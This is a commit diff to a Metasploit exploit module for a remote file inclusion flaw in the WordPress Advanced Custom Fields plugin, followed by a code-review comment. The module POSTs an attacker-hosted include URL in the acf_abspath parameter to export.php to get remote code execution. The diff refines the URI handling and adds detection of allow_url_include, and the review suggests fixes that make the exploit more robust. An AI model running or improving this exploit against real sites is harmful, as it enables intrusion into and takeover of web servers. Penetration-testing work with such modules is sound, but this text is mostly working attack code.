Multiple change for Juan
Incorporated changes as per Juan's suggestions. - Removed redundant space option for the payload - Doing the uri more intelligently - Detecting allow_url_include being disabled and reporting it - Moved to unix/webapp - Removed redundant handler call - Adding to description that this requires allow_url_include to be enabledbug/bundler_fix
parent
78c6d04b31
commit
97253d46a1
|
@ -20,7 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
This module exploits a remote file inclusion flaw in the WordPress
|
This module exploits a remote file inclusion flaw in the WordPress
|
||||||
blogging software plugin known as Advanced Custom Fields. The vulnerability allows for
|
blogging software plugin known as Advanced Custom Fields. The vulnerability allows for
|
||||||
remote file inclusion and remote code execution via the export.php script. The
|
remote file inclusion and remote code execution via the export.php script. The
|
||||||
Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable.
|
Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit
|
||||||
|
only works when the php option allow_url_include is set to On(Default Off).
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
@ -40,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'ConnectionType' => 'find',
|
'ConnectionType' => 'find',
|
||||||
},
|
},
|
||||||
'Space' => 262144, # 256k
|
|
||||||
},
|
},
|
||||||
'Platform' => 'php',
|
'Platform' => 'php',
|
||||||
'Arch' => ARCH_PHP,
|
'Arch' => ARCH_PHP,
|
||||||
|
@ -58,10 +58,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def check
|
def check
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
uri << '/' if uri[-1,1] != '/'
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
uri << datastore['PLUGINSPATH']
|
||||||
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => "#{uri}#{datastore['PLUGINSPATH']}advanced-custom-fields/core/api.php"
|
'uri' => "#{uri}advanced-custom-fields/core/api.php"
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200
|
if res and res.code == 200
|
||||||
|
@ -72,25 +74,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def php_exploit
|
def php_exploit
|
||||||
|
|
||||||
uri = target_uri.path
|
uri = target_uri.path
|
||||||
uri << '/' if uri[-1,1] != '/'
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
uri << datastore['PLUGINSPATH']
|
||||||
plugin_path = "#{datastore['PLUGINSPATH']}advanced-custom-fields/core/actions/export.php"
|
uri << '/' if uri[-1,1] != '/'
|
||||||
|
|
||||||
print_status('Sending request')
|
print_status('Sending request')
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => "#{uri}#{plugin_path}",
|
'uri' => "#{uri}advanced-custom-fields/core/actions/export.php",
|
||||||
'data' => "acf_abspath=#{php_include_url}"
|
'data' => "acf_abspath=#{php_include_url}"
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code != 200
|
if res and res.body =~ /allow_url_include/
|
||||||
|
fail_with(Exploit::Failure::NotVulnerable, 'allow_url_include is disabled')
|
||||||
|
elsif res.code != 200
|
||||||
fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
|
fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
|
||||||
end
|
end
|
||||||
|
|
||||||
handler
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
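Review bot: The new `elsif res.code != 200` branch dereferences `res` after the preceding `if res and res.body =~ /allow_url_include/` has already allowed it to be nil, so a timeout or dropped connection now raises NoMethodError instead of the clean fail_with that the removed `if res and res.code != 200` produced. Guard the nil case before inspecting the body: `fail_with(Exploit::Failure::Unreachable, 'No response from target') unless res` followed by `if res.body =~ /allow_url_include/`. The `/allow_url_include/` body match presumably depends on the PHP warning text being echoed back, so NotVulnerable is only reported when the target surfaces that message; a one-line comment above it, `# detection relies on the allow_url_include warning appearing in the response body`, would record that limitation. The trailing-slash handling added to php_exploit and check repeats the same idiom twice; `uri << '/' unless uri.end_with?('/')` reads more directly than `uri[-1,1] != '/'`.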
|